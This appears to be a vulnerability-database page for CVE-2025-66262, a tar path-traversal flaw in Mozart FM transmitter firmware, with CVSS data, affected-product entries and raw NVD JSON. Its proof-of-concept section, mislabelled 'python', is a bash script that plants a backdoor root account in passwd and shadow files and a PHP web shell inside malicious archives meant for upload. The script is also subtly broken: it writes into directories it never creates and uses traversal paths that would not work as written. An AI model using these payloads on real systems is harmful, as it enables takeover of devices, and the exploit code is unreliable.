CVE-2025-66262

Description

Arbitrary File Overwrite via Tar Extraction Path Traversal in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Tar extraction with -C / allow arbitrary file overwrite via crafted archive. The `restore_mozzi_memories.sh` script extracts user-controlled tar archives with `-C /` flag, depositing contents to the filesystem root without path validation. When combined with the unauthenticated file upload vulnerabilities (CVE-01, CVE-06, CVE-07), attackers can craft malicious .tgz archives containing path-traversed filenames (e.g., `etc/shadow`, `var/www/index.php`) to overwrite critical system files in writable directories, achieving full system compromise.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dbbroadcast:mozart_next_300:-:*:*:*:*:*:*:* - NOT VULNERABLE

Mozart FM Transmitter 30

Mozart FM Transmitter 50

Mozart FM Transmitter 100

Mozart FM Transmitter 300

Mozart FM Transmitter 500

Mozart FM Transmitter 1000

Mozart FM Transmitter 2000

Mozart FM Transmitter 3000

Mozart FM Transmitter 3500

Mozart FM Transmitter 6000

Mozart FM Transmitter 7000

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-66262 PoC - Malicious tar archive creation
# Target: DB Electronica Mozart FM Transmitter

# Create a directory for the exploit
mkdir -p exploit_archive

# Create a malicious passwd file (backdoor account)
cat > exploit_archive/etc/passwd << 'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
backdoor:$1$evil$Sr5fDJhX3n5gOQjK1kXjK0:0:0:backdoor:/root:/bin/bash
EOF

# Create a malicious shadow file
cat > exploit_archive/etc/shadow << 'EOF'
root:$6$evil$8W4vRf5xH3n5gOQjK1kXjK0:19400:0:99999:7:::
backdoor:$6$evil$8W4vRf5xH3n5gOQjK1kXjK0:19400:0:99999:7:::
EOF

# Create a malicious index.php for web shell
cat > exploit_archive/var/www/html/index.php << 'EOF'
<?php
if(isset($_GET['cmd'])) {
    echo '<pre>';
    system($_GET['cmd']);
    echo '</pre>';
}
?>
EOF

# Create the malicious tar archive with path traversal
cd exploit_archive
tar -czf ../malicious_backup.tgz etc/../../../etc/passwd
tar -czf ../malicious_backup2.tgz var/../../var/www/html/index.php

# Alternative: Create archive that extracts to root using symlinks
mkdir -p exploit_archive/etc
cd exploit_archive
ln -sf ../../../etc/shadow etc/shadow
tar -czf ../malicious_symlink.tgz etc/shadow

# Cleanup
cd ..
rm -rf exploit_archive

echo "Malicious archives created:"
echo "- malicious_backup.tgz"
echo "- malicious_backup2.tgz"
echo "- malicious_symlink.tgz"
echo ""
echo "Upload one of these files via the restore functionality"
echo "to trigger CVE-2025-66262"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66262
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66262
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66262/
[4] VulDB https://vuldb.com/cve/CVE-2025-66262
[5] https://www.abdulmhsblog.com/posts/webfmvulns/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66262", "sourceIdentifier": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "published": "2025-11-26T01:16:09.737", "lastModified": "2025-12-03T16:51:48.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arbitrary File Overwrite via Tar Extraction Path Traversal in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform Tar extraction with -C / allow arbitrary file overwrite via crafted archive.\nThe `restore_mozzi_memories.sh` script extracts user-controlled tar archives with `-C /` flag, depositing contents to the filesystem root without path validation. When combined with the unauthenticated file upload vulnerabilities (CVE-01, CVE-06, CVE-07), attackers can craft malicious .tgz archives containing path-traversed filenames (e.g., `etc/shadow`, `var/www/index.php`) to overwrite critical system files in writable directories, achieving full system compromise."}], "metrics": {"cvssMetricV40": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2B25533-2EF5-4158-9505-1CD18463DB68"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7834E460-78EE-456A-84F7-0DECE004BD80"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A3497F7E-0433-444B-A58A-A795C8833966"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "FDEB3E77-E3D8-4878-BBE3-74530F3469B4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A975C91C-59BD-44AC-9F67-0682CE173738"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "F30F6688-FCDA-4BA5-ABD9-0EB91CDF7631"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7B57D15-6192-4D68-9CC5-726E052E7DDD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA1C3BA1-3E25-474B-B2A4-971 ... (truncated)